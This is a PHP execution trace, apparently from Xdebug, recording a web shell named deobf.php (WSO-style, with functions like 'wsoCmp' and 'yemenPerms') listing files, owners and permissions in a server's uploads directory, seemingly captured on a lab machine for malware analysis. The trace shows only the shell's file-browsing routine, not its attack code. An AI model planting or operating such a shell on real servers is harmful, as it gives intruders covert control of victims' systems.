2 A /var/www/html/uploads/deobf.php 1335 $tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3 235 0 0.206599 1019168 is_file 0 /var/www/html/uploads/deobf.php 1336 1 '/var/www/html/uploads/.'
3 235 1 0.206612 1019208
3 235 R FALSE
3 236 0 0.206626 1019168 is_link 0 /var/www/html/uploads/deobf.php 1337 1 '/var/www/html/uploads/.'
3 236 1 0.206641 1019232
3 236 R FALSE
3 237 0 0.206655 1019192 is_dir 0 /var/www/html/uploads/deobf.php 1338 1 '/var/www/html/uploads/.'
3 237 1 0.206667 1019232
3 237 R TRUE
2 A /var/www/html/uploads/deobf.php 1333 $i++
3 238 0 0.206691 1019144 fileowner 0 /var/www/html/uploads/deobf.php 1333 1 '..'
3 238 1 0.206706 1019168
3 238 R 0
3 239 0 0.206718 1019128 posix_getpwuid 0 /var/www/html/uploads/deobf.php 1333 1 0
3 239 1 0.206743 1019928
3 239 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/deobf.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 240 0 0.206785 1019160 filegroup 0 /var/www/html/uploads/deobf.php 1334 1 '..'
3 240 1 0.206798 1019200
3 240 R 0
3 241 0 0.206810 1019160 posix_getgrgid 0 /var/www/html/uploads/deobf.php 1334 1 0
3 241 1 0.206833 1019816
3 241 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/deobf.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 242 0 0.206869 1019680 filemtime 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/..'
3 242 1 0.206884 1019744
3 242 R 1676247232
3 243 0 0.206897 1019648 date 0 /var/www/html/uploads/deobf.php 1335 2 'Y-m-d H:i:s' 1676247232
3 243 1 0.206929 1019976
3 243 R '2023-02-12 19:13:52'
3 244 0 0.206944 1019960 yemenPermsColor 1 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/..'
4 245 0 0.206964 1019960 is_readable 0 /var/www/html/uploads/deobf.php 1299 1 '/var/www/html/uploads/..'
4 245 1 0.206980 1020000
4 245 R TRUE
4 246 0 0.206994 1019960 is_writable 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/..'
4 246 1 0.207009 1020000
4 246 R TRUE
4 247 0 0.207022 1019960 fileperms 0 /var/www/html/uploads/deobf.php 1301 1 '/var/www/html/uploads/..'
4 247 1 0.207035 1020000
4 247 R 16895
4 248 0 0.207048 1019960 yemenPerms 1 /var/www/html/uploads/deobf.php 1301 1 16895
4 A /var/www/html/uploads/deobf.php 1285 $i = 'd'
4 A /var/www/html/uploads/deobf.php 1289 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1290 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1291 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1292 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1293 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1294 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1295 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1296 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1297 $i .= 'x'
4 248 1 0.207159 1020000
4 248 R 'drwxrwxrwx'
3 244 1 0.207174 1020024
3 244 R '<font color=#25ff00>drwxrwxrwx</font>'
3 249 0 0.207191 1020024 filesize 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/..'
3 249 1 0.207204 1020064
3 249 R 4096
2 A /var/www/html/uploads/deobf.php 1335 $tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3 250 0 0.207248 1019216 is_file 0 /var/www/html/uploads/deobf.php 1336 1 '/var/www/html/uploads/..'
3 250 1 0.207261 1019256
3 250 R FALSE
3 251 0 0.207275 1019216 is_link 0 /var/www/html/uploads/deobf.php 1337 1 '/var/www/html/uploads/..'
3 251 1 0.207290 1019264
3 251 R FALSE
3 252 0 0.207303 1019224 is_dir 0 /var/www/html/uploads/deobf.php 1338 1 '/var/www/html/uploads/..'
3 252 1 0.207316 1019264
3 252 R TRUE
3 253 0 0.207330 1019168 array_merge 0 /var/www/html/uploads/deobf.php 1338 2 ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] ['type' => 'dir']
3 253 1 0.207355 1019608
3 253 R ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/deobf.php 1338 $dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/deobf.php 1333 $i++
3 254 0 0.207414 1019920 fileowner 0 /var/www/html/uploads/deobf.php 1333 1 '.htaccess'
3 254 1 0.207429 1019944
3 254 R 0
3 255 0 0.207442 1019904 posix_getpwuid 0 /var/www/html/uploads/deobf.php 1333 1 0
3 255 1 0.207466 1020704
3 255 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/deobf.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 256 0 0.207508 1019936 filegroup 0 /var/www/html/uploads/deobf.php 1334 1 '.htaccess'
3 256 1 0.207521 1019976
3 256 R 0
3 257 0 0.207534 1019936 posix_getgrgid 0 /var/www/html/uploads/deobf.php 1334 1 0
3 257 1 0.207556 1020592
3 257 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/deobf.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 258 0 0.207592 1020456 filemtime 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/.htaccess'
3 258 1 0.207607 1020512
3 258 R 1676247232
3 259 0 0.207621 1020416 date 0 /var/www/html/uploads/deobf.php 1335 2 'Y-m-d H:i:s' 1676247232
3 259 1 0.207653 1020744
3 259 R '2023-02-12 19:13:52'
3 260 0 0.207668 1020728 yemenPermsColor 1 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/.htaccess'
4 261 0 0.207682 1020728 is_readable 0 /var/www/html/uploads/deobf.php 1299 1 '/var/www/html/uploads/.htaccess'
4 261 1 0.207698 1020768
4 261 R TRUE
4 262 0 0.207711 1020728 is_writable 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/.htaccess'
4 262 1 0.207731 1020768
4 262 R FALSE
4 263 0 0.207746 1020728 fileperms 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/.htaccess'
4 263 1 0.207759 1020768
4 263 R 33188
4 264 0 0.207773 1020728 yemenPerms 1 /var/www/html/uploads/deobf.php 1300 1 33188
4 A /var/www/html/uploads/deobf.php 1283 $i = '-'
4 A /var/www/html/uploads/deobf.php 1289 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1290 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1291 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1292 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1293 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1294 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1295 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1296 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1297 $i .= '-'
4 264 1 0.207885 1020768
4 264 R '-rw-r--r--'
3 260 1 0.207900 1020792
3 260 R '<font color=white>-rw-r--r--</font>'
3 265 0 0.207917 1020792 filesize 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/.htaccess'
3 265 1 0.207931 1020832
3 265 R 64
2 A /var/www/html/uploads/deobf.php 1335 $tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']
3 266 0 0.207967 1020416 is_file 0 /var/www/html/uploads/deobf.php 1336 1 '/var/www/html/uploads/.htaccess'
3 266 1 0.207980 1020456
3 266 R TRUE
3 267 0 0.207994 1020360 array_merge 0 /var/www/html/uploads/deobf.php 1336 2 ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root'] ['type' => 'file']
3 267 1 0.208017 1020800
3 267 R ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/deobf.php 1336 $files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/deobf.php 1333 $i++
3 268 0 0.208075 1021112 fileowner 0 /var/www/html/uploads/deobf.php 1333 1 'data'
3 268 1 0.208090 1021128
3 268 R 0
3 269 0 0.208103 1021088 posix_getpwuid 0 /var/www/html/uploads/deobf.php 1333 1 0
3 269 1 0.208126 1021888
3 269 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/deobf.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 270 0 0.208168 1021120 filegroup 0 /var/www/html/uploads/deobf.php 1334 1 'data'
3 270 1 0.208181 1021160
3 270 R 0
3 271 0 0.208194 1021120 posix_getgrgid 0 /var/www/html/uploads/deobf.php 1334 1 0
3 271 1 0.208216 1021776
3 271 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/deobf.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 272 0 0.208252 1021640 filemtime 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/data'
3 272 1 0.208267 1021704
3 272 R 1676247232
3 273 0 0.208281 1021608 date 0 /var/www/html/uploads/deobf.php 1335 2 'Y-m-d H:i:s' 1676247232
3 273 1 0.208312 1021936
3 273 R '2023-02-12 19:13:52'
3 274 0 0.208327 1021920 yemenPermsColor 1 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/data'
4 275 0 0.208341 1021920 is_readable 0 /var/www/html/uploads/deobf.php 1299 1 '/var/www/html/uploads/data'
4 275 1 0.208356 1021960
4 275 R TRUE
4 276 0 0.208370 1021920 is_writable 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/data'
4 276 1 0.208385 1021960
4 276 R TRUE
4 277 0 0.208398 1021920 fileperms 0 /var/www/html/uploads/deobf.php 1301 1 '/var/www/html/uploads/data'
4 277 1 0.208411 1021960
4 277 R 16895
4 278 0 0.208424 1021920 yemenPerms 1 /var/www/html/uploads/deobf.php 1301 1 16895
4 A /var/www/html/uploads/deobf.php 1285 $i = 'd'
4 A /var/www/html/uploads/deobf.php 1289 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1290 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1291 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1292 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1293 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1294 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1295 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1296 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1297 $i .= 'x'
4 278 1 0.208540 1021960
4 278 R 'drwxrwxrwx'
3 274 1 0.208555 1021984
3 274 R '<font color=#25ff00>drwxrwxrwx</font>'
3 279 0 0.208572 1021984 filesize 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/data'
3 279 1 0.208586 1022024
3 279 R 4096
2 A /var/www/html/uploads/deobf.php 1335 $tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3 280 0 0.208622 1021608 is_file 0 /var/www/html/uploads/deobf.php 1336 1 '/var/www/html/uploads/data'
3 280 1 0.208635 1021648
3 280 R FALSE
3 281 0 0.208649 1021608 is_link 0 /var/www/html/uploads/deobf.php 1337 1 '/var/www/html/uploads/data'
3 281 1 0.208664 1021648
3 281 R FALSE
3 282 0 0.208677 1021608 is_dir 0 /var/www/html/uploads/deobf.php 1338 1 '/var/www/html/uploads/data'
3 282 1 0.208691 1021648
3 282 R TRUE
3 283 0 0.208704 1021552 array_merge 0 /var/www/html/uploads/deobf.php 1338 2 ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] ['type' => 'dir']
3 283 1 0.208727 1021992
3 283 R ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/deobf.php 1338 $dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/deobf.php 1333 $i++
3 284 0 0.208785 1021928 fileowner 0 /var/www/html/uploads/deobf.php 1333 1 'deobf.php'
3 284 1 0.208801 1021952
3 284 R 1000
3 285 0 0.208814 1021912 posix_getpwuid 0 /var/www/html/uploads/deobf.php 1333 1 1000
3 285 1 0.208844 1022728
3 285 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/deobf.php 1333 $ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 286 0 0.208887 1021960 filegroup 0 /var/www/html/uploads/deobf.php 1334 1 'deobf.php'
3 286 1 0.208901 1022000
3 286 R 1000
3 287 0 0.208914 1021960 posix_getgrgid 0 /var/www/html/uploads/deobf.php 1334 1 1000
3 287 1 0.208946 1022616
3 287 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 A /var/www/html/uploads/deobf.php 1334 $gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 288 0 0.208982 1022480 filemtime 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/deobf.php'
3 288 1 0.208997 1022536
3 288 R 1676247232
3 289 0 0.209011 1022440 date 0 /var/www/html/uploads/deobf.php 1335 2 'Y-m-d H:i:s' 1676247232
3 289 1 0.209042 1022768
3 289 R '2023-02-12 19:13:52'
3 290 0 0.209057 1022752 yemenPermsColor 1 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/deobf.php'
4 291 0 0.209071 1022752 is_readable 0 /var/www/html/uploads/deobf.php 1299 1 '/var/www/html/uploads/deobf.php'
4 291 1 0.209087 1022792
4 291 R TRUE
4 292 0 0.209100 1022752 is_writable 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/deobf.php'
4 292 1 0.209115 1022792
4 292 R FALSE
4 293 0 0.209129 1022752 fileperms 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/deobf.php'
4 293 1 0.209144 1022792
4 293 R 33204
4 294 0 0.209157 1022752 yemenPerms 1 /var/www/html/uploads/deobf.php 1300 1 33204
4 A /var/www/html/uploads/deobf.php 1283 $i = '-'
4 A /var/www/html/uploads/deobf.php 1289 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1290 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1291 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1292 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1293 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1294 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1295 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1296 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1297 $i .= '-'
4 294 1 0.209294 1022792
4 294 R '-rw-rw-r--'
3 290 1 0.209309 1022816
3 290 R '<font color=white>-rw-rw-r--</font>'
3 295 0 0.209325 1022816 filesize 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/deobf.php'
3 295 1 0.209339 1022856
3 295 R 100449
2 A /var/www/html/uploads/deobf.php 1335 $tmp = ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes']
3 296 0 0.209375 1022440 is_file 0 /var/www/html/uploads/deobf.php 1336 1 '/var/www/html/uploads/deobf.php'
3 296 1 0.209388 1022480
3 296 R TRUE
3 297 0 0.209402 1022384 array_merge 0 /var/www/html/uploads/deobf.php 1336 2 ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes'] ['type' => 'file']
3 297 1 0.209425 1022824
3 297 R ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2 A /var/www/html/uploads/deobf.php 1336 $files[] = ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2 A /var/www/html/uploads/deobf.php 1333 $i++
3 298 0 0.209483 1022760 fileowner 0 /var/www/html/uploads/deobf.php 1333 1 'prepend.php'
3 298 1 0.209500 1022784
3 298 R 0
3 299 0 0.209513 1022744 posix_getpwuid 0 /var/www/html/uploads/deobf.php 1333 1 0
3 299 1 0.209537 1023544
3 299 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/deobf.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 300 0 0.209578 1022760 filegroup 0 /var/www/html/uploads/deobf.php 1334 1 'prepend.php'
3 300 1 0.209592 1022800
3 300 R 0
3 301 0 0.209605 1022760 posix_getgrgid 0 /var/www/html/uploads/deobf.php 1334 1 0
3 301 1 0.209627 1023416
3 301 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/deobf.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 302 0 0.209662 1023296 filemtime 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/prepend.php'
3 302 1 0.209678 1023360
3 302 R 1676247232
3 303 0 0.209692 1023256 date 0 /var/www/html/uploads/deobf.php 1335 2 'Y-m-d H:i:s' 1676247232
3 303 1 0.209724 1023584
3 303 R '2023-02-12 19:13:52'
3 304 0 0.209739 1023576 yemenPermsColor 1 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/prepend.php'
4 305 0 0.209753 1023576 is_readable 0 /var/www/html/uploads/deobf.php 1299 1 '/var/www/html/uploads/prepend.php'
4 305 1 0.209769 1023616
4 305 R TRUE
4 306 0 0.209782 1023576 is_writable 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/prepend.php'
4 306 1 0.209798 1023616
4 306 R FALSE
4 307 0 0.209812 1023576 fileperms 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/prepend.php'
4 307 1 0.209825 1023616
4 307 R 33261
4 308 0 0.209838 1023576 yemenPerms 1 /var/www/html/uploads/deobf.php 1300 1 33261
4 A /var/www/html/uploads/deobf.php 1283 $i = '-'
4 A /var/www/html/uploads/deobf.php 1289 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1290 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1291 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1292 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1293 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1294 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1295 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1296 $i .= '-'
4 A /var/www/html/uploads/deobf.php 1297 $i .= 'x'
4 308 1 0.209950 1023616
4 308 R '-rwxr-xr-x'
3 304 1 0.209965 1023640
3 304 R '<font color=white>-rwxr-xr-x</font>'
3 309 0 0.209986 1023640 filesize 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/prepend.php'
3 309 1 0.210000 1023680
3 309 R 57
2 A /var/www/html/uploads/deobf.php 1335 $tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']
3 310 0 0.210035 1023264 is_file 0 /var/www/html/uploads/deobf.php 1336 1 '/var/www/html/uploads/prepend.php'
3 310 1 0.210050 1023304
3 310 R TRUE
3 311 0 0.210063 1023200 array_merge 0 /var/www/html/uploads/deobf.php 1336 2 ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root'] ['type' => 'file']
3 311 1 0.210086 1023640
3 311 R ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/deobf.php 1336 $files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/deobf.php 1333 $i++
2 A /var/www/html/uploads/deobf.php 1339 GLOBALS['sort'] = [0 => 'name', 1 => 1]
3 312 0 0.210159 1023600 usort 0 /var/www/html/uploads/deobf.php 1342 2 [0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']] 'wsoCmp'
4 313 0 0.210196 1024048 wsoCmp 1 /var/www/html/uploads/deobf.php 1342 2 ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
5 314 0 0.210225 1024048 strtolower 0 /var/www/html/uploads/deobf.php 1340 1 '.htaccess'
5 314 1 0.210239 1024080
5 314 R '.htaccess'
5 315 0 0.210253 1024048 strtolower 0 /var/www/html/uploads/deobf.php 1340 1 'deobf.php'
5 315 1 0.210266 1024080
5 315 R 'deobf.php'
5 316 0 0.210281 1024048 strcmp 0 /var/www/html/uploads/deobf.php 1340 2 '.htaccess' 'deobf.php'
5 316 1 0.210294 1024112
5 316 R -1
4 313 1 0.210309 1024048
4 313 R -1
4 317 0 0.210322 1024048 wsoCmp 1 /var/www/html/uploads/deobf.php 1342 2 ['name' => 'deobf.php', 'path' => '/var/www/html/uploads/deobf.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'] ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
5 318 0 0.210350 1024048 strtolower 0 /var/www/html/uploads/deobf.php 1340 1 'deobf.php'
5 318 1 0.210363 1024080
5 318 R 'deobf.php'
5 319 0 0.210377 1024048 strtolower 0 /var/www/html/uploads/deobf.php 1340 1 'prepend.php'
5 319 1 0.210390 1024080
5 319 R 'prepend.php'
5 320 0 0.210404 1024048 strcmp 0 /var/www/html/uploads/deobf.php 1340 2 'deobf.php' 'prepend.php'
5 320 1 0.210418 1024112
5 320 R -1
4 317 1 0.210431 1024048
4 317 R -1
3 312 1 0.210444 1023672
3 312 R TRUE
3 321 0 0.210457 1023624 usort 0 /var/www/html/uploads/deobf.php 1343 2 [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']] 'wsoCmp'
4 322 0 0.210486 1024072 wsoCmp 1 /var/www/html/uploads/deobf.php 1343 2 ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:13:52', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
5 323 0 0.210512 1024072 strtolower 0 /var/www/html/uploads/deobf.php 1340 1 '..'
5 323 1 0.210524 1024104
5 323 R '..'
5 324 0 0.210537 1024072 strtolower 0 /var/www/html/uploads/deobf.php 1340 1 'data'
5 324 1 0.210549 1024104
5 324 R 'data'
5 325 0 0.210562 1024072 strcmp 0 /var/www/html/uploads/deobf.php 1340 2 '..' 'data'
5 325 1 0.210575 1024136
5 325 R -3552051
4 322 1 0.210589 1024072
4 322 R -3552051
3 321 1 0.210602 1023696
3 321 R TRUE
